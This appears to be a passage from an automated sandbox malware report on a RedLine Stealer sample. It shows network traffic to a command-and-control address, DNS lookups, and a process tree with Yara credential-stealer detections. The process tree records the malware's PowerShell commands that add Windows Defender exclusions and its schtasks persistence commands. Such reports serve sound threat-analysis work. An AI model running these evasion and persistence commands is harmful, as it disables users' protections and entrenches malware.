                      Jun 15, 2024 20:22:22.922700882 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.922755003 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.923113108 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.923113108 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.928051949 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.928081989 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.928103924 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.928132057 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.928152084 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.928159952 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.928189039 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.928208113 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.928220987 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.928252935 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.928339005 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.928366899 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.928416967 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.932372093 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.932456970 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.932457924 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.932507992 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.933129072 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.933177948 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.933181047 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.933207989 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.933255911 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.933264017 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.933284998 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.933314085 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.933339119 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.933495045 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.974293947 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.974421024 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.022219896 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.022274017 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.070172071 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.070229053 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.118232965 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.118518114 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.166363001 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.166462898 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.214201927 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.220511913 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.270370960 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.270559072 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.318248034 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.318428040 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.366364002 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.366983891 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.418523073 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.418622017 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.466478109 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.466589928 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.518975973 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.519157887 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.524339914 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.524373055 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.524425983 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.524440050 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.524468899 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.524559021 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.524575949 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:23.524626970 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.524658918 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.524687052 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:23.524715900 CEST556154972045.137.22.67192.168.2.5
                      TimestampSource PortDest PortSource IPDest IP
                      Jun 15, 2024 20:22:19.792176008 CEST6133753192.168.2.51.1.1.1
                      Jun 15, 2024 20:22:33.087971926 CEST5265953192.168.2.51.1.1.1
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jun 15, 2024 20:22:19.792176008 CEST192.168.2.51.1.1.10x57cbStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
                      Jun 15, 2024 20:22:33.087971926 CEST192.168.2.51.1.1.10x1de4Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jun 15, 2024 20:22:19.799233913 CEST1.1.1.1192.168.2.50x57cbNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                      Jun 15, 2024 20:22:33.103152990 CEST1.1.1.1192.168.2.50x1de4No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                      • 45.137.22.67:55615

                      Click to jump to process

                      Target ID:0
                      Start time:14:21:59
                      Start date:15/06/2024
                      Path:C:\Users\user\Desktop\w4XFffGDz1.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\w4XFffGDz1.exe"
                      Imagebase:0x170000
                      File size:920'266 bytes
                      MD5 hash:2185ECDE5380054AD075B7A25AE0EA51
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:14:22:01
                      Start date:15/06/2024
                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Imagebase:0x600000
                      File size:743'944 bytes
                      MD5 hash:86F98523CEB67DF5CC3431A839F63134
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 88%, ReversingLabs
                      • Detection: 58%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      Target ID:8
                      Start time:14:22:08
                      Start date:15/06/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Imagebase:0x8d0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:14:22:09
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:10
                      Start time:14:22:09
                      Start date:15/06/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Imagebase:0x8d0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:11
                      Start time:14:22:09
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:14:22:09
                      Start date:15/06/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
                      Imagebase:0xbb0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:13
                      Start time:14:22:09
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:14
                      Start time:14:22:10
                      Start date:15/06/2024
                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Imagebase:0xcb0000
                      File size:743'944 bytes
                      MD5 hash:86F98523CEB67DF5CC3431A839F63134
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:15
                      Start time:14:22:10
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:16
                      Start time:14:22:11
                      Start date:15/06/2024
                      Path:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      Imagebase:0xb00000
                      File size:743'944 bytes
                      MD5 hash:86F98523CEB67DF5CC3431A839F63134
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 88%, ReversingLabs
                      • Detection: 58%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      Target ID:17
                      Start time:14:22:11
                      Start date:15/06/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff6ef0c0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:19
                      Start time:14:22:18
                      Start date:15/06/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
                      Imagebase:0xbb0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:20
                      Start time:14:22:18
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:21
                      Start time:14:22:18
                      Start date:15/06/2024
                      Path:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Imagebase:0xac0000
                      File size:743'944 bytes
                      MD5 hash:86F98523CEB67DF5CC3431A839F63134
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:22
                      Start time:14:22:18
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      No disassembly